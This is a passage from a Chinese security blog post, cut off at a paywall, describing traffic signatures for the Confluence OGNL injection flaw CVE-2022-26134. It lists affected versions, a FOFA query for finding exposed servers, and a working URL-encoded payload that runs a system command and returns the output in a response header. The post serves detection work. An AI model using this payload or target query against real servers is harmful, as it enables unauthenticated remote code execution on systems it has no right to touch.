CVE-2022-26134-Confluence OGNL表达式注入命令执行漏洞流量特征

最新推荐文章于 2024-05-17 14:42:20 发布
最新推荐文章于 2024-05-17 14:42:20 发布
阅读量1.3k 收藏 1
点赞数
分类专栏: 安全运营 流量分析 ATT&CK 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36334464/article/details/125457290
版权

CVE-2022-26134-Confluence OGNL表达式注入命令执漏洞流量特征

简介

Confluence是一个专业的企业知识管理与协同软件,也可以用于构建企业wiki。使用简单,但它强大的编辑和站点管理特征能够帮助团队成员之间共享信息、文档协作、集体讨论,信息推送。

Confluence Server and Data Center存在一个远程代码执行漏洞,未经身份验证的攻击者可以利用该漏洞向目标服务器注入恶意ONGL表达式,进而在目标服务器上执行任意代码。

受影响范围

Confluence Server and Data Center >= 1.3.0
Confluence Server and Data Center < 7.4.17
Confluence Server and Data Center < 7.13.7
Confluence Server and Data Center < 7.14.3
Confluence Server and Data Center < 7.15.2
Confluence Server and Data Center < 7.16.4
Confluence Server and Data Center < 7.17.4
Confluence Server and Data Center < 7.18.1

EXP/POC

请勿用做非法用途,仅用于检测测试,提取流量特征。

fofa语法:icon_hash=“-305179312”

/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22id%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/

URL decode

/${
   (#a=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec("' command '").getInputStream(),"utf-8")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("X-Cmd-Response",#a))}/

Http报文

GET /%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22id%22%2
最低0.47元/天 解锁文章
12306Br0
关注
专栏目录
漏洞复现】Atlassian Confluence(CVE-2022-26134)OGNL远程代码执行
做自己喜欢的事,并将其发挥到极致!
06-06 2225
本篇文章所涉及技术与工具仅用于技术研究、漏洞复现,切勿用于非法渗透攻击行为,造成任何后果与本作者无关,切记!!!Atlassian Confluence 是一款各企业广泛使用的 wiki 系统。在上存在OGNL 注入漏洞,恶意攻击者可以利用该漏洞在目标Atlassian Confluence Server and Data Center服务器上注入恶意ONGL表达式 ,造成远程代码执行。......
Atlassian Confluence 远程代码执行漏洞CVE-2022-26134漏洞分析与防护
不忘初心,护天下安全!
06-24 974
Confluence是一款专业的企业知识管理与协同软件,常用于企业wiki的构建,支持团队成员间开展信息共享、文档协作、集体讨论和信息推送等工作,具有较为便捷的编辑和站点管理特性。该软件由Atlassian公司负责开发和维护。2022年6月3日,国家信息安全漏洞共享平台(CNVD)收录了Confluence远程代码执行漏洞(CNVD-2022-43094,对应CVE-2022-26134)。在Atlassian Confluence Server and Data Center上存在OGNL注入漏洞,恶意攻
ONGL表达式
04-24
ONGL表达式,不解释,需要的就下吧,很全面的一份资料,看了就知道了
命令执行注入告警流量特征-网络安全
weixin_71061514的博客
02-01 624
在看设备告警时候出现命令执行告警,这个可以辅助你判断是否是真实攻击,
常见漏洞流量特征
m0_62207482的博客
02-28 2254
如果url上有大量的../../../../../../关键字符就有可能攻击者利用目录遍历来攻击,也要结合../后面是什么目录,若是敏感目录或者文件(例如:/etc/passwd、php后缀、conf后缀等)就要着重看一下,或者url上是各种编码,要进行解码进行查看内容。例 http://127.0.0.1/pikachu/vul/ssrf/ssrf_curl.php?()、load_file()、seelp()、length()、exp()、group by()、substr()、and、or等函数。
ognl概念和原理详解
黑马蓝梦的专栏
05-12 7967
引言:众所周知,在mvc中,数据是在各个层次之间进行流转是一个不争的事实。而这种流转,也就会面临一些困境,这些困境,是由于数据在不同世界中的表现形式不同而造成的:   1. 数据在页面上是一个扁平的,不带数据类型的字符串,无论你的数据结构有多复杂,数据类型有多丰富,到了展示的时候,全都一视同仁的成为字符串在页面上展现出来。   2. 数据在Java世界中可以表现为丰富的数据结构和数据类型,你可
OGNL表达式注入分析 _
sdgfafg_25的博客
03-29 890
如一开始的例子#a=new java.lang.String("calc"),定义了一个字符串常量。
Confluence OGNL表达式注入漏洞复现与分析(CVE-2022-26134
Brucetg的博客
06-06 4488
在受影响的 Confluence Server 和 Data Center 版本中,存在一个 OGNL 注入漏洞,该漏洞允许未经身份验证的攻击者在 Confluence Server 或 Data Center 实例上执行任意代码。
Atlassian Confluence 远程代码执行 CVE-2022-26134漏洞复现
m0_60635609的博客
04-07 999
Atlassian Confluence是Atlassian公司出品的专业wiki程序。攻击者可利用漏洞在未经身份验证的情况下,远程构造OGNL表达式进行注入,在Confluence Server或Data Center上执行任意代码。请相关用户尽快自检并采取措施进行防护。(Confluence还有个RCE,为了好区分,我习惯把是CVE-2021-26084这个叫OGNL表达式注入命令执行漏洞,在后续的文章,我也会复现CVE-2021-26084)
Java表达式注入OGNL 表达式注入
GalaxySpaceX的博客
08-23 2224
Java表达式注入OGNL 表达式注入
ongl表达式
m0_37351830的博客
07-30 202
OGNL表达式 Object Graphic Navigation Language 对象图导航语言:通过对象的取值方法来获取数据,在写法上把get给省略了。mybatis使用ognl表达式解析对象字段的是,#{}或者%{}括号中的值为pojo属性名称 比如:获取用户的名称: 一般类中的写法:user.getUserame(); OGNL中的写法:user.username; 在mybatis中...
【struts中ognl表达式的原理】
旺旺的博客
06-28 505
目录前言ognl的基本信息聊一聊为什么要验证ognl认证案列1(OgnlContext)论证案列2(ValueStack) 前言 今天讲的内容,咱先给大家说清楚,昨天的博客初步使用 上不是讲了关于struts的种种好用的使用嘛, 比如:动态方法的调用,ModelDriven/set*get自动接收前台信息,前台接收的注入和非注入 嗯,一个方法的便捷总有他便捷的地方,所以今天咱们就来了解了解上面黄色...
OGNL表达式
难不难的博客
09-27 1167
OGNL表达式 OGNL表达式:是一种独立的表达式语言,不依赖与任何的框架 OGNL表达式特点:从root区,ContextMap区取数据 a)从Root区取数据 B)从ContextMap区取数据 注意:ContextMap本身是一个map,在单独测试OgNL 时需要提供一个Map集合
Struts2之OGNL表达式
qq_42640067的博客
01-09 882
Struts2之OGNL表达式
linux 远程执行本地shell_流量检测如何实锤远程代码执行反弹shell成功
weixin_39590453的博客
11-23 421
通常在渗透中挖掘到了远程代码执行漏洞,攻击者会利用漏洞执行操作系统命令获得系统相关信息,也可写入webshel或者是直接反弹shell到攻击者监听的服务器。上述的攻击行为也都是有特征可以做检测的,但是仅仅依据特征检测通常只能检测到探测攻击,每台流量检测设备每天的探测日志是海量的,安全运营人员很难从中获得价值信息。如果通过引擎关联上反弹shell的特征以及成功以后的后续动作即可去判断攻击成...
Struts2系列(四)OGNL表达式
仲夏风灯
07-16 1530
一.OGNL表达式概述 Struts2支持OGNL表达式 OGNL是Object-Graph Navigation Language的缩写,它是一种功能强大的表达式语言,通过它简单一致的表达式语法,可以存取对象的任意属性,调用对象的方法,遍历整个对象的结构图,实现字段类型转化等功能。它使用相同的表达式去存取对象的属性。 webwork2和现在的Struts2.x中使用OGNL取代原来的EL来...
常见流量特征
最新发布
admin的博客
05-17 1119
1、特殊关键字:SQL关键字,如SELECT, WHERE, ORDER BY, UNION, UPDATE,DELETE,INSERT等,这些通常用于构建或修改查询系统函数,如USER(), @@VERSION(在MySQL中),这些可能用于获取数据库版本或当前用户等敏感信息特定数据库的函数或特性,如information_schema(用于获取数据库结构信息)、extractvalue(XML相关函数,有时用于绕过某些过滤)、floor(在盲注中用于产生条件差异)等。
Apache Spark 命令注入漏洞CVE-2022-33891)修复与利用
Apache Spark 命令注入漏洞CVE-2022-33891)是 Apache Spark 中的一种高危漏洞,允许攻击者通过命令注入执行恶意命令,从而控制服务器。该漏洞影响 Apache Spark 版本小于 3.0.3、3.1.1 到 3.1.2 以及 3.3.0 及...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值